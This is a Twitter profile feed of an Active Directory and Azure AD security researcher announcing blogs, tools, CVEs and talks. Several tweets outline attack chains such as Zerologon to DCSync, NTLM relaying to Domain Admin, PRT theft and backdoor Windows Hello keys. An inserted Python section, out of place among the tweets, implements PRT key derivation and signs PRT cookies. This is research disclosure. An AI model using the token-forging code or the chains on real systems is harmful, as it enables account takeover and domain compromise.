Dirk-jan (@_dirkjan)
Followers: 25,501. Following: 181. Media: 128. Statuses: 1,812.
Hacker at @OutsiderSec. Researches AD and Azure (AD) security. Likes to play around with Python and write tools that make work easier.
Joined December 2017

Pinned tweet. @_dirkjan (Dirk-jan), 2 years ago:
Some big personal news: last year I decided to start my own company. Today I'm making it official and announcing Outsider Security (@OutsiderSec). My focus will be on Azure AD and Active Directory security, converting my research experience into in-depth tests and advice.

@_dirkjan (Dirk-jan), 2 years ago:
Fox-IT just open sourced their enterprise forensics tooling dissect. This is a big project that some of the smartest people I know have worked on. It supports many filesystems and file formats, all as Python libraries. Docs: / code:

@_dirkjan (Dirk-jan), 4 years ago:
So yes, Zerologon (CVE-2020-1472) is quite easy to exploit. Unauthenticated user to Domain Admin. This is really scary. Run exploit, DCSync with DC account and empty NT hash: you have Domain Admin and a broken DC. Awesome find by Tom Tervoort 🙂. Patch patch patch!

@_dirkjan (Dirk-jan), 4 years ago:
It has a few more prerequisites, but I finally managed to get a #Zerologon exploit working that doesn't rely on resetting passwords to exploit. Use the printerbug to make DC1 connect to you, then with lots of magic relay that to DC2 directly to DRSUAPI to DCSync 😁

@_dirkjan (Dirk-jan), 4 years ago:
New blog: A different way of abusing Zerologon. No more password reset needed: using the printer bug with Zerologon to relay to DRSUAPI and DCSync directly with ntlmrelayx. Code:

@_dirkjan (Dirk-jan), 4 years ago:
There seem to be quite some questions and confusion about the impact of exploiting Zerologon (CVE-2020-1472) on the environment. So here's a thread 👇

@_dirkjan (Dirk-jan), 2 years ago:
New blog: Relaying Kerberos over DNS using krbrelayx and mitm6. New method of gaining RCE on AD hosts in the same VLAN without credentials or needing NTLM, by abusing Kerberos, DNS and Active Directory Certificate Services. Blog:

@_dirkjan (Dirk-jan), 2 years ago:
I've added the material from my Black Hat US talk yesterday to my blog. If you are interested in Azure AD security, love account hijacks, MFA bypass, persistence techniques and privescs, give it a read:

@_dirkjan (Dirk-jan), 5 years ago:
New blog! Abusing Exchange: One API call away from Domain Admin. From any user with a mailbox to Domain Admin. Probably affects the majority of orgs using AD and Exchange.

@_dirkjan (Dirk-jan), 5 years ago:
Just published: "Getting in the Zone: dumping Active Directory DNS using adidnsdump". Recon tool to dump DNS records in AD as any authenticated user, similar to a zone transfer. Tool: Blog:

@_dirkjan (Dirk-jan), 5 years ago:
Since everyone loves dumping credentials, I've put together a tool for remotely dumping Azure AD Connect credentials for my #TR19 talk. Uses only SMB and RPC calls, no code exec on the target host 😁

@_dirkjan (Dirk-jan), 3 years ago:
What a time to be alive... Install the Microsoft signed Hybrid Connection Manager on victim host, link it up with your Azure app, enjoy persistent access to the on-prem network from your Azure portal. Only needs https outbound to Azure and line of sight from victim to target host.

@_dirkjan (Dirk-jan), 5 years ago:
[Blog] Office 365 was vulnerable to network attacks due to a vulnerability in Microsoft Teams. Here's a demo of an attacker obtaining access to all emails and OneDrive/SharePoint files if the victim joins an attacker controlled network. Details:

@_dirkjan (Dirk-jan), 5 years ago:
Short blog and POC code for CVE-2019-1040 (patched last Tuesday). Combining this vulnerability with the SpoolService bug and Kerberos delegation means: any AD user to Domain Admin; RCE on unpatched hosts; possible over Forest trusts. TL;DR: GO PATCH!

@_dirkjan (Dirk-jan), 1 year ago:
New blog: Obtaining Domain Admin from Azure AD by abusing Cloud Kerberos Trust. I teased this a bit during my Windows Hello talks, now found some time to write about this interesting technique. Also contains defenses and detection opportunities.

@_dirkjan (Dirk-jan), 5 years ago:
I wrote a small scanner utility to check if systems are vulnerable to CVE-2019-1040, the NTLM MIC vulnerability that allows for Active Directory takeover. Published here:

@_dirkjan (Dirk-jan), 5 years ago:
Tool release: adconnectdump. Three approaches to dumping #Azure AD Connect credentials, from executing code on the host to fully over the network. For technical background, see the slides of my #TR19 talk 😃

@_dirkjan (Dirk-jan), 3 years ago:
It's been long overdue, but my part 2 blog on Active Directory forest trusts is finally here! This blog is about trust transitivity and on the finding on CVE-2020-0665, which was a trust bypass by faking a domain. Enjoy the (long) read:

@_dirkjan (Dirk-jan), 7 months ago:
It's been quiet for a while around BloodHound Python, however I'm happy to share that I am now maintaining the project at my personal GitHub. The latest version fixes many bugs/issues, also thanks to the many PRs that were submitted (thanks all!).

@_dirkjan (Dirk-jan), 9 months ago:
New blog: Phishing for Primary Refresh Tokens and Windows Hello keys. This blog describes how we can use device code phishing to obtain PRTs and in some cases even add backdoor Windows Hello keys 🤯

@_dirkjan (Dirk-jan), 2 years ago:
New blog: "Abusing forgotten permissions on computer objects in Active Directory". The post is a dive into permissions that are set when you pre-create computer accounts the wrong way, why BloodHound missed those and how to abuse, fix, or monitor for this.

@_dirkjan (Dirk-jan), 4 years ago:
New cool blog by my @FoxIT colleague Rindert: Command and control over LDAP attributes. Running Cobalt Strike over LDAP as a control channel to bypass network restrictions. Blog: Tool:

@_dirkjan (Dirk-jan), 3 years ago:
Playing a bit with @harmj0y and @tifkin_'s AD CS research today, this stuff is seriously 🔥🔥🔥. Low priv to DA by default/"design".

@_dirkjan (Dirk-jan), 6 years ago:
Still think machine accounts are useless when relaying? Not when you relay an Exchange server account and get instant Domain Admin :D mitm6 + ntlmrelayx = relay Exchange server account -> modify domain ACL -> DCSync with #mimikatz or #impacket

@_dirkjan (Dirk-jan), 4 years ago:
New blog up! "Abusing Azure AD SSO with the Primary Refresh Token", digging into hybrid environments, SSO, Conditional Access policies and other Azure AD fun. New update for ROADtools, introducing ROADtoken, which uses SSO to get persistent Azure AD tokens.

@_dirkjan (Dirk-jan), 8 months ago:
Hey @bookingcom, I'm getting scammed via your official message system on a real booking. Sounds like you're having some security troubles.

@_dirkjan (Dirk-jan), 2 months ago:
New blog: Lateral movement and on-prem NT hash dumping with Microsoft Entra Temporary Access Passes. Some tips and tricks on abusing TAPs for Windows Hello persistence and NT hash recovery over Cloud Kerberos Trust.

@_dirkjan (Dirk-jan), 2 years ago:
BloodHound 4.1 was just released and I'm happy to share that the BloodHound Python ingestor is ready for the new format and edges it introduces! Via GitHub only for now, please test and let me know if there are errors 🙂

@_dirkjan (Dirk-jan), 2 years ago:
Just found an interesting lateral movement/post-ex technique in Azure AD to move between identities. It's stealthy, non-destructive, bypasses MFA, and can be used to move from cloud to on-prem in several hybrid scenarios. Now moving on to figure out all scenarios and impact 😅

@_dirkjan (Dirk-jan), 5 years ago:
secretsdump(.py) slow processing your NTDS.dit? Soon not anymore! With @Schamperr's esedb parser implementation, processing time of a 5GB dit file went from 45 minutes down to 1.5 minutes 😲! Code will be released as open source when fully ready 🙂

@_dirkjan (Dirk-jan), 3 years ago:
Content of my #RomHack2021 talk "Breaking Azure AD joined endpoints in Zero Trust environments" is up! Video: Slides (pdf): As usual all the links to my talk materials are also on

@_dirkjan (Dirk-jan), 5 years ago:
Thanks to @elad_shamir's research, network access once again means RCE against Windows hosts in that (V)LAN. Combining mitm6, ntlmrelayx and RBCD to abuse AD defaults. New blog: The worst of both worlds, Combining NTLM relaying and Kerberos Delegation:

@_dirkjan (Dirk-jan), 5 years ago:
[New blog] Updating adconnectdump - a journey into DPAPI; in which I describe the process of understanding and decrypting the DPAPI encrypted credentials of Azure AD Connect. This again enables dumping these credentials via only network calls (as admin).

@_dirkjan (Dirk-jan), 1 year ago:
Took me a few days, still don't know exactly how/why it works, but I now have a new-ish on-prem to cloud technique via a Seamless SSO (Kerberos) backdoor key. Some features:
- No GA needed to add key
- Invisible backdoor (no logs in AAD) 🫣
- 1st factor auth to any synced user

@_dirkjan (Dirk-jan), 6 years ago:
2 new releases today exploiting default settings in AD! First: Invoke-ACLPwn, a PowerShell script to exploit ACL paths detected by #BloodHound. Second is the ACL attack for ntlmrelayx: relaying machine accounts for DA! Code: Blog:

@_dirkjan (Dirk-jan), 4 years ago:
This patch Tuesday brings patches for some memory corruptions I found in AD integrated DNS which could lead to RCE from Authenticated Users to SYSTEM on a Domain Controller... CVEs assigned are CVE-2020-0644, CVE-2020-0761 and CVE-2020-0718.

@_dirkjan (Dirk-jan), 6 years ago:
Just uploaded the first version of , an impacket-based BloodHound ingestor in Python. It is still in beta and not complete, so testing and feedback is welcome!

@_dirkjan (Dirk-jan), 4 years ago:
Thanks to everyone who attended the live stream! My Azure AD framework ROADtools is now available. Includes the ROADrecon exploration tool. Blog + stream recording: Code:

@_dirkjan (Dirk-jan), 2 years ago:
New blog and tool: Introducing ROADtools Token eXchange (roadtx) - Automating Azure AD authentication, Primary Refresh Token (ab)use and device registration. Blog: Code: Some features in screenshot attached.

@_dirkjan (Dirk-jan), 4 years ago:
Quite a nice post about Azure AD attacks, summarizes a lot of work done in this area and features ROADtools 😃

@_dirkjan (Dirk-jan), 5 years ago:
Thanks all for attending my #DEFCON talk! Humbling to see such a full room even on Sunday. Slides and demo videos are online at the media server. Slides: Demo vids:

@_dirkjan (Dirk-jan), 2 years ago:
I am officially announcing my first training offering "Offensive Azure AD and Hybrid AD security". It is an in-depth, hands-on training that teaches the core concepts, protocols and attack techniques of Azure AD and hybrid environments. Check:

@_dirkjan (Dirk-jan), 3 years ago:
Did you know an Azure AD user can read the BitLocker key for any device they own? (Provided the BitLocker key is backed up to Azure AD.) The latest version of roadrecon shows BitLocker keys in the GUI. You can also see them for all devices in several roles (including read roles).

@_dirkjan (Dirk-jan), 5 years ago:
It's been a while since I posted about BloodHound.py, but lots of things have been added! Now at v0.7.0, with support for ACL collection, loggedon, DCOM/RDP and object properties. Also works with Python 3 now! Check it out on the @foxit GitHub

@_dirkjan (Dirk-jan), 5 years ago:
Just got the news that my talk about Azure security has been accepted for #DEFCON 😁😁😁 super happy right now and very excited to share my latest research! 😀

@_dirkjan (Dirk-jan), 4 years ago:
Today's patch Tuesday fixes CVE-2020-0665, which is an Active Directory forest trust security bypass using Kerberos magic 🙃 if you use forests as a security boundary you may want to patch this. Advisory (though text is inaccurate):

@_dirkjan (Dirk-jan), 5 years ago:
Seems Microsoft is finally taking a stance against NTLM relaying to LDAP, by enforcing LDAP signing and channel binding by default starting January 2020. This is a big and important change to improve AD security, especially from a network point of view!
Quoted tweet, @qd285 (Christoph Kuderna), 5 years ago:
"Microsoft strongly advises customers..." always a warning, especially if it involves DCs and LDAP and MS announces upcoming changes.

@_dirkjan (Dirk-jan), 5 years ago:
The recording of my #Azure AD talk at #TR19 is now online! If you want to learn about Azure AD account takeover, AD Sync password extraction, privilege escalations and SSO weaknesses, you can watch the full talk on YT:

@_dirkjan (Dirk-jan), 4 years ago:
Another blog on the Primary Refresh Token! Thx @gentilkiwi for figuring this out with me! TL;DR: PRT can be extracted from lsass with #mimikatz 🥝. If with TPM, session key is protected. Still possible to extract derived keys and sign your own PRT cookies.

@_dirkjan (Dirk-jan), 4 years ago:
Been a long day but thanks to @gentilkiwi's awesome new mimikatz CloudAP support we managed to put together tooling that can sign arbitrary PRT cookies! Secrets from lsass + DPAPI + crypto magic + horrible C code = working POC of session key extraction.

@_dirkjan (Dirk-jan), 5 years ago:
Slides and video of my #bluehatseattle talk "A year of hacking Azure AD" are online! Contains my exploration of the unofficial "1.61-internal" version of the Azure AD graph and the resulting vulnerabilities 😃 Slides: Video:

@_dirkjan (Dirk-jan), 5 years ago:
For those looking into building/testing detection for #PrivExchange, but don't have a lab available, here are a pcap and event log export.

@_dirkjan (Dirk-jan), 5 years ago:
New blog up: Syncing yourself to Global Administrator in Azure AD; describing a vulnerability I discovered last year in Azure AD Connect that allowed for #Azure AD/Office 365 (admin) account takeover.

@_dirkjan (Dirk-jan), 4 years ago:
Since @_wald0 and @CptJesus just released #BloodHound 3.0 I've merged the v3 branch of the BloodHound Python ingestor and pushed the new version to PyPI. New version works with v3 syntax and contains many fixes and new features! See

@_dirkjan (Dirk-jan), 6 years ago:
Very excited to start a personal blog! Kicking off today with the first part of my research into Active Directory forest trusts: How does SID filtering work? Including techniques to pwn incorrectly configured forest trusts ;)

@_dirkjan (Dirk-jan), 5 years ago:
Microsoft released patches for #PrivExchange today! 1) Latest version won't authenticate when sending push notifications 2) Exchange privileges in AD are reduced (!), removing DACL control over the domain root object (+ others). This requires manual rerun of setup.exe /prepareAD

@_dirkjan (Dirk-jan), 2 years ago:
The video recording of my Black Hat talk this summer "Backdooring and Hijacking Azure AD Accounts by Abusing External Identities" made it to YouTube:

@_dirkjan (Dirk-jan), 5 years ago:
Slides from my @WEareTROOPERS #TR19 talk about hacking Azure AD are now online! Was so much fun presenting here 😀 recording of the talk and tools release will follow!

@_dirkjan (Dirk-jan), 8 months ago:
In other news, more than 4 years after I reported this, Microsoft finally removed the ability to modify Conditional Access policies via the Azure AD Graph. 🎉 Before this change, the AD Connect sync account could change/remove all policies, defeating MFA reqs via CA.

@_dirkjan (Dirk-jan), 1 year ago:
In other training news, I've been notified that my Azure AD security training has been accepted for Black Hat USA in Las Vegas this summer 🥳 Looking forward to see everyone in Vegas again! 😁

@_dirkjan (Dirk-jan), 2 years ago:
The Python BloodHound ingestor was updated to support GPO/OU/container collection. Thanks to @_zblurx for the PR. The Python version is now functionally equivalent to the official C# version for DCOnly collection. Also thanks to @itm4n who added registry based session enum 🔥

@_dirkjan (Dirk-jan), 5 years ago:
As promised, here is @donnymaasland's blog about bypassing McAfee's password and admin check which lets you export and import the configuration. This allows viewing exclusions, adding your own or changing the protection password.

@_dirkjan (Dirk-jan), 4 years ago:
Just pushed v1.0.4 of the Python BloodHound ingestor to PyPI, containing various bugfixes. Thanks for the bug reports everyone!

@_dirkjan (Dirk-jan), 4 months ago:
👀 looks like Microsoft started with rolling out the Conditional Access features for controlling device code flow auth that I mentioned in my last blog. Seems to be in preview, not in all tenants yet.

@_dirkjan (Dirk-jan), 2 years ago:
🥳 super excited that I'll be back in Vegas this summer, presenting for the first time at Black Hat US #BHUSA! I'll give a talk about my latest research on hijacking and backdooring accounts via external identities in Azure AD 😁.

@_dirkjan (Dirk-jan), 2 years ago:
Relaying Kerberos, for real this time 😁 (teaser, needs some more work)

@_dirkjan (Dirk-jan), 6 years ago:
v0.4.0 of is now up! Major rewrite and cross domain support now make it support all of SharpHound's default collection. Also removed the beta labels since it has been tested without issues on several networks. Get it at or PyPI.

@_dirkjan (Dirk-jan), 4 years ago:
Because Microsoft quietly removed the possibility to sign in using the Primary Refresh Token (Azure AD SSO) without a nonce, I've slightly altered the flow with ROADrecon and ROADtoken to request a nonce first. Blog also updated:

@_dirkjan (Dirk-jan), 2 years ago:
New BloodHound version 4.2 means new BloodHound[.]py version 😀 BloodHound Python v1.4.0 is now live, compatible with the latest BloodHound version. It includes the research from my last blog as a new edge "WriteAccountRestrictions", which also got added to SharpHound ❤️

@_dirkjan (Dirk-jan), 5 years ago:
During my DC27 and TR19 talks I talked about App Admins (and Sync accounts) escalating privileges in #AzureAD by taking over service principals. I thought this was fixed for default #Office365 apps. Turns out it isn't and is considered by design. Here's a blog:

@_dirkjan (Dirk-jan), 6 years ago:
New blog post up with @FSDominguez: Listening on port 445 on Windows and remote NTLM relaying through tunnels with ntlmrelayx and meterpreter.

@_dirkjan (Dirk-jan), 11 months ago:
I've been putting this off for a long time, but finally decided to give it a go: AD FS and federated domains in Azure AD. With some results, mostly thanks to @doughsec. Coming soon to ROADtools: SAML token crafting and AD FS spoofing 😁

@_dirkjan (Dirk-jan), 1 year ago:
Small update to roadtx, with thanks to @Flangvik for the idea: you can now do the interactive authentication with a "borrowed" ESTSAUTHPERSISTENT cookie from a browser, to get tokens or have an authenticated browser session.

@_dirkjan (Dirk-jan), 3 years ago:
There's a lot going around about analyzing Azure AD environments for compromise and risky/rogue permissions lately. Most focus on logs, but if there are no (more) logs or you just want to review AAD as a blue teamer, here is how ROADrecon () can help:

@_dirkjan (Dirk-jan), 3 years ago:
I've made some major improvements to data gathering with ROADrecon in larger tenants. Data collection is now much faster, uses automatic throttling and retries requests when throttled by AAD Graph. Would love if people can give it a try in larger tenants.

@_dirkjan (Dirk-jan), 8 months ago:
Always wanted to find out which Microsoft first-party app has the right pre-approved scope for what you need? roadtx now has a "getscope" utility, which lists the clients with the desired scope. Useful if you want to access API data without admin approval.

@_dirkjan (Dirk-jan), 2 years ago:
In my Black Hat talk I referenced a guest account hijack that is very hard to identify after the fact. For blue teamers here, I've made a KQL query available for hunting this abuse in Azure AD audit logs. It should be possible to identify historical abuse:

@_dirkjan (Dirk-jan), 4 years ago:
Too bad for the hours I spent writing this in C, but I did finally figure out how to do the Primary Refresh Token key derivation in Python. This means you can now use the session key from Mimikatz directly in roadlib/roadrecon! Only with version on GitHub
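As an added illustration written for this page (not roadlib's code) of the construction behind "PRT key derivation" and "sign your own PRT cookies" from the earlier tweets: SP 800-108 KDF in counter mode with HMAC-SHA256 turns the session key plus a per-request ctx value into a signing key, and the cookie is an HS256 JWT that carries ctx in its header so the other side can re-derive the same key. The label string, the 24-byte ctx and the claim names are assumptions taken from the public PRT write-ups; the session key and tokens are constructed values.

```python
import base64
import hashlib
import hmac
import json
import os
import struct

# KDF label reported for the PRT session key in the public PRT research; treated here as an assumption.
PRT_KDF_LABEL = b"AzureAD-SecureConversation"


def kdf_ctr_hmac_sha256(key, label, context, length=32):
    """NIST SP 800-108 KDF in counter mode with HMAC-SHA256 as the PRF.

    Block i = HMAC(key, [i]_32 || label || 0x00 || context || [L]_32), big-endian counters,
    L = requested length in bits.
    """
    out, i = b"", 1
    while len(out) < length:
        msg = struct.pack(">I", i) + label + b"\x00" + context + struct.pack(">I", length * 8)
        out += hmac.new(key, msg, hashlib.sha256).digest()
        i += 1
    return out[:length]


def derive_prt_key(session_key, ctx):
    """Per-request signing key: the session key never signs anything directly, only keys derived from it."""
    return kdf_ctr_hmac_sha256(session_key, PRT_KDF_LABEL, ctx, 32)


def _b64url(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _b64url_decode(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_prt_cookie(refresh_token, session_key, request_nonce, ctx=None):
    """HS256-signed PRT cookie; the header carries ctx so the relying party can re-derive the key.

    Claim names follow the publicly described cookie layout and are an assumption for this example.
    """
    ctx = ctx if ctx is not None else os.urandom(24)
    header = {"alg": "HS256", "typ": "JWT", "ctx": base64.b64encode(ctx).decode()}
    payload = {"refresh_token": refresh_token, "is_primary": "true", "request_nonce": request_nonce}
    signing_input = (_b64url(json.dumps(header, separators=(",", ":")).encode()) + "."
                     + _b64url(json.dumps(payload, separators=(",", ":")).encode()))
    sig = hmac.new(derive_prt_key(session_key, ctx), signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + _b64url(sig)


def verify_prt_cookie(token, session_key):
    """Re-derive the key from the header's ctx and check the HMAC in constant time."""
    try:
        h, p, s = token.split(".")
        ctx = base64.b64decode(json.loads(_b64url_decode(h))["ctx"])
        sig = _b64url_decode(s)
    except (ValueError, KeyError, TypeError):
        return False
    expected = hmac.new(derive_prt_key(session_key, ctx), (h + "." + p).encode(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, sig)


if __name__ == "__main__":
    session_key = bytes(range(32))                       # constructed; in practice dumped from lsass
    cookie = sign_prt_cookie("0.AXYZ-constructed-refresh-token", session_key, "AwABAAEA-constructed-nonce")
    print(cookie)
    print(verify_prt_cookie(cookie, session_key))
```

The point the tweets make follows from the structure: anything that can compute derive_prt_key for a fresh ctx can mint valid cookies, so possession of the session key (or, on TPM-backed devices where it stays sealed, of already derived keys) is what matters, and a nonce in request_nonce only limits replay of one cookie, not the signing capability.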

@_dirkjan (Dirk-jan), 3 years ago:
The number of times people have simply clicked "Approve" for us when we ran into Azure AD MFA is surprisingly high. It really makes me wonder if MFA via push notifications is such a good idea at all security wise.

@_dirkjan (Dirk-jan), 2 years ago:
Working on some tooling, and managed to get PRT injection during browser sign-in working with Selenium. If you steal a PRT from a hybrid/compliant device, you can use this to "upgrade" the sign-in of other users, to comply with Conditional Access policies requiring this status.

@_dirkjan (Dirk-jan), 4 years ago:
With a few small modifications @MDSecLabs' Office 365 attack toolkit works with ROADtools tokens. This makes it a nice GUI for API tokens obtained with SSO abuse or via other means. cc @0x09AL

@_dirkjan (Dirk-jan), 4 years ago:
If you're playing with Kerberos and want to view the encrypted parts in Wireshark you can do so with a keytab file. Since impacket was missing structures for this I added a script to my forest trust tools repo which easily allows adding multiple keys:

@_dirkjan (Dirk-jan), 5 years ago:
Because nobody likes waiting, my @foxit colleague Matthijs wrote a Python based BloodHound data loader for neo4j, which is a factor 3-5 times faster than the UI:

@_dirkjan (Dirk-jan), 4 years ago:
I've probably spent way too much time on this but it's getting near the point I want it to be for first release. Explore Azure AD with #ROADtools. Now I "just" have to transfer the things I wanted to put in a talk into a blog and make it release ready... Soon(-ish)!

@_dirkjan (Dirk-jan), 6 years ago:
We just released v0.3.0 of , adding multithreading, trusts and cross-domain logins! If you can, please test it and let us know about issues.

@_dirkjan (Dirk-jan), 1 year ago:
The slides and recording from my @NorthSec_io talk (Windows) Hello from the other side are available at I've also released a new version of roadtx that supports the AAD Windows Hello key provisioning process and authentication to get PRTs 🙂

@_dirkjan (Dirk-jan), 1 year ago:
📢 In the last weeks, Microsoft has patched several major flaws in Windows Hello for Business and Azure AD. In short, it was possible to: provision new WHFB keys without MFA or via SSO tokens, and move laterally by registering keys on other users, if done from a privileged role.

@_dirkjan (Dirk-jan), 3 years ago:
I'll be revisiting the details of my AD forest trust bypass that was patched last year. If you're into obscure Kerberos details, this may interest you 🙃 my aim is to also drop the tools and blog around this date!
Quoted tweet, @BlackHatEvents (Black Hat), 3 years ago:
This free webcast provides technical details on how Kerberos works over forest trusts and how the security boundary is normally enforced, accompanied by a proof-of-concept and a demonstration of abusing the vulnerability. June 3 at 11am PST. Register here:

@_dirkjan (Dirk-jan), 1 year ago:
New major roadrecon release is out! This release adds support for:
- Eligible AAD admin roles (PIM)
- Scoped and custom roles
- Administrative Units
All now in the GUI and readable by any member user in the tenant (yes, including eligible roles) 😀

@_dirkjan (Dirk-jan), 5 years ago:
I remember being here last year and thinking how cool it would be to be mentioned here... And now I am! A lot of growth in just a year, thanks to everyone who motivated, inspired, shared and supported my research! Goal for next year: higher than #68 😁

@_dirkjan (Dirk-jan), 6 years ago:
More tools and blog in progress: playing with unconstrained delegation, impacket and printer bugs to compromise forests 😀

@_dirkjan (Dirk-jan), 10 months ago:
Curious about the (in)security of Windows Hello for Business? Want to know how you could add new WHFB keys without MFA and move laterally with them? The recording of my talk about this topic at Troopers 23 is now online!

@_dirkjan (Dirk-jan), 1 year ago:
This Tuesday, Microsoft rolled out patches for a Windows Hello for Business vulnerability that I found. It's tracked as CVE-2023-36871. I don't know if/when I'll give a talk about this, but essentially this defeated the TPM protection of WHFB keys.

@_dirkjan (Dirk-jan), 2 years ago:
Here's a demo of the MFA bypass, which I particularly love because it could all be done in the GUI, no need to do any lower level operations (original at )

@_dirkjan (Dirk-jan), 4 years ago:
Excited for my talk tomorrow at the (free!) @WWHackinFest Cloud pentesting roundup! Giving a talk about Azure AD Conditional Access policies. Slides still need some work but I have a logo 😁 Tomorrow Dec 10th at 2pm eastern / 18:00 CET! More details: